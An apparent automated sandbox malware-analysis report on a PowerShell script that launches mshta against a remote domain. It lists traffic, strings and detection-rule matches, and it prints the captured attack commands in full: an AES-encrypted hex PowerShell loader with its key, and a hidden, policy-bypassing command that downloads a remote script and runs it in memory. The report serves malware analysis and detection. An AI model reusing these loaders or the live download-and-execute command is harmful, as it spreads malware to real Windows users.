Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.1782207034.0000000007960000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\dll\System.pdb source: powershell.exe, 00000006.00000002.1783092425.0000000007A14000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: global trafficHTTP traffic detected: GET /madonna.vstx HTTP/1.1Host: pawpaws1.readit-carfanatics.comConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /madonna.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pawpaws.readit-carfanatics.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /madonna.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pawpaws.readit-carfanatics.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /madonna.vstx HTTP/1.1Host: pawpaws1.readit-carfanatics.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: pawpaws.readit-carfanatics.com
Source: global trafficDNS traffic detected: DNS query: pawpaws1.readit-carfanatics.com
Source: svchost.exe, 00000003.00000002.2911938505.000001EB7740F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1711652478.000001EB772D8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1711652478.000001EB772D8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1711652478.000001EB772D8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1711652478.000001EB7730D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1790101993.00000000098FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pawpaws1.readit-carfanatics.com
Source: powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04A5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04A75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018900001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1773889837.00000000052D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.1773889837.0000000005427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1738683834.0000018900F17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000004.00000002.1738683834.0000018900234000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.00000189101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1738683834.0000018901CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1763127026.0000018910081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.000000000633D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1778378109.0000000006479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000003.00000003.1711652478.000001EB77382000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000000.00000002.1684443354.000001CD04EF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.X
Source: mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/
Source: mshta.exe, 00000002.00000002.1800263773.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1778778827.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798247384.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1797864697.000001C19C8AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/eE
Source: mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1String found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4
Source: mshta.exe, 00000002.00000003.1790913512.000001C9A1D6D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792017935.000001C9A1D6E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4(
Source: mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4-
Source: mshta.exe, 00000002.00000002.1805106055.000001C99EA75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4...
Source: mshta.exe, 00000002.00000003.1779290701.000001C99EB09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4...F
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4/E
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp41
Source: mshta.exe, 00000002.00000003.1779641762.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1782599751.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793135818.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1806411558.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783270231.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1784469451.000001C9A2D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp46
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4:
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4C:
Source: mshta.exe, 00000002.00000002.1800072120.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4E
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1804268352.000001C19E1D0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4H
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4O
Source: mshta.exe, 00000002.00000002.1799754505.000001C19C7D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4ROFILE_STRING=I
Source: mshta.exe, 00000002.00000002.1807186379.000001C9A4130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4S
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4T
Source: mshta.exe, 00000002.00000003.1794253380.000001C19C867000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1783060357.000001C19C867000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4TTC:
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4d4LMEMp
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4fE
Source: mshta.exe, 00000002.00000003.1792131695.000001C9A1D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4https://pawpaws.readit-carfanatics.com/madonna.mp4
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4i
Source: mshta.exe, 00000002.00000002.1805106055.000001C99EA60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4ic
Source: mshta.exe, 00000002.00000003.1779854987.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1793336898.000001C99EB18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1792624686.000001C99EB09000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1805508732.000001C99EB19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4mLMEMh
Source: mshta.exe, 00000002.00000002.1799903969.000001C19C7FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4oG
Source: mshta.exe, 00000002.00000003.1783060357.000001C19C82B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1800072120.000001C19C82C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1794253380.000001C19C82C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4rC:
Source: mshta.exe, 00000002.00000002.1800030988.000001C19C818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1798206246.000001C19C818000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4w
Source: mshta.exe, 00000002.00000003.1788000132.000001C9A3BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws.readit-carfanatics.com/madonna.mp4x
Source: powershell.exe, 00000006.00000002.1790101993.00000000098F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws1.readit-carfanatic
Source: powershell.exe, 00000006.00000002.1790101993.00000000096F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1790101993.0000000009421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pawpaws1.readit-carfanatics.com
Source: powershell.exe, 00000006.00000002.1769565150.00000000032E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pawpaws1.readit-carfanatics.com/madonna.vstx
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.201.143:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2518
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2518Jump to behavior
Source: Process Memory Space: powershell.exe PID: 7752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal80.evad.winPS1@11/14@2/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gqsu1bu.3z3.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C7244C519247C7C2F9CE8D7FA4027320E443B37F498F4BCDE2E63A97AC0167DCBD9DF73193FA93B3A82859FC1C7C6A740DD7140682426D7269E3DDEB5AB9467EC828C2C24E5D9149A12D98DFF32D05203D7536888907C29CA12DFCFB29B179E5F80DF3C545318D33794FAE90BEC7C573D81530A72C3E1664C1FCD78FFE0CC509A78F2E435BEE0A9EE5E4C0F5F6825B6883A784655B387AC0A63D3779D94D06E0C3BFC63D493D83B351266304E3C6A7FE938DB9F5FFD576369C82CA0050C55C2E8E82286D9AC048EE0F6E20CF515B8D1A1268959B2D3E695204352487CF3533397B42917060A182262AA9F2EA0B93E6742C4A2C669E95CD728');$MIDMd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((qtyVd('794A5742476F737A6A656E545246734B')),[byte[]]::new(16)).TransformFinalBlock($ZKIHj,0,$ZKIHj.Length)); & $MIDMd.Substring(0,3) $MIDMd.Substring(129)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command & {'2LT'|ForEach-Object {SI Variable:2LT ([PowerShell]::Create()); [Void](Get-Item Variable:\2LT).Value.AddScript((([System.Net.WebClient]::New().((([System.Net.WebClient]::New()|Get-Member)|Where-Object{(Get-Variable _ -Value).Name -ilike '*wn*d*g'}).Name)('https://pawpaws1.readit-carfanatics.com/madonna.vstx')))); (Get-Item Variable:\2LT).Value.Invoke(); (Get-Item Variable:\2LT).Value.Dispose()}}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pawpaws.readit-carfanatics.com/madonna.mp4Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function qtyVd($UNYZ){return -split ($UNYZ -replace '..', '0x$& ')};$ZKIHj = qtyVd('943C2C5C46A72B5C4C8C5C1A51E4FDD0974703BCE4EDF56B369378DFB2ECC854E259560AB569239046F77EA06A763337BD3340FF80B07C3CFCE33778E61B44845B5324775EE6ECAD2D2F37DD4F8DC9D93A8ABA7267AA5EA340079FA2334C6403714460816209B0D0411244284F7B8814FD62C23E419A8D047CB9595A51FEA7A3BCA7328CC8FCAF14C3F8165E90E2486DFAD60C27534F2C51C86D7F420CBBA4ABB44CACB3574A60609ED4B1F8BBC087D26FFE66EEB68F5686820C155B78783E6E11CF5815FCD1E2F8CA8C49791C0C4DF291EA66A7712921D9C59DB6E39D4F98ED2DC1A8E7A9946079CA7BF16CE0B32D041BED47781FEB352BDF1FB6018763D773644268B71F2526F6A617A9272A9ACDB0172FF20C3D1547782E3DBE0EDEC2C049AEA1DCE8744256C6E8717D86E602BF21D022B7E481612FD0E5AD43DEF8AEFF4BB1BB463D861888792AC5CFDAC45C5AAD05BEE91DABCC7A8CE6DC0862F3E928BE382F093C9D84D38A85151EEABB858C33520B5AABA90DFF68EE69A74D113C6C05BC871865DA879842D0B54C1DB7F4958097D12CECC5F9E39C9F6EF9ADF065DDA2643775FF589BDDA148E4527B97DE7BA451AC1EE997B73B0A1625177692622E4719148456AC24DEEA746D100F63E2E62646F66B245D3EED88607AB4D8A6022FA2F645BBFA59344E4471CB907FA8E491AA033889DB9D942E3F5420FF522C4C2C6217479BAC41430765CC37214D382A23920123068E397CA5AE645C1D0119DB511F8B852EA48834469651D0EC476969F2449303E7019452064057CE45DC4E16896B015B29CB64430183AF5618B121490DEE43084DC3253BC82E49716867CB584156D7865E1FA9DA392090109DF6E9A6CEFCAB60BE063896FE271D5F7145798747455EBE31B24E9BAE3DDE94E125C3AAB0F1CC7DA5D7D2C49F75D3D71BE3450EDFB23086A4D618521B1EE6EA4F7759E9CFC131005524C9B65D1D3D9FCB4F3E8A222D8020E0829864F6709CEA97810C2185CB147F13C7495B150A44FE94EC3E805FBE21BAB82B15870CAE560AAE4D4D533E433ABF4E5A563B39F36B23B63195F3779B0F8E07AE51936D7659CF47354C6662908568295088267D164DBF8CD609767B8170DEFEE21B10CE5C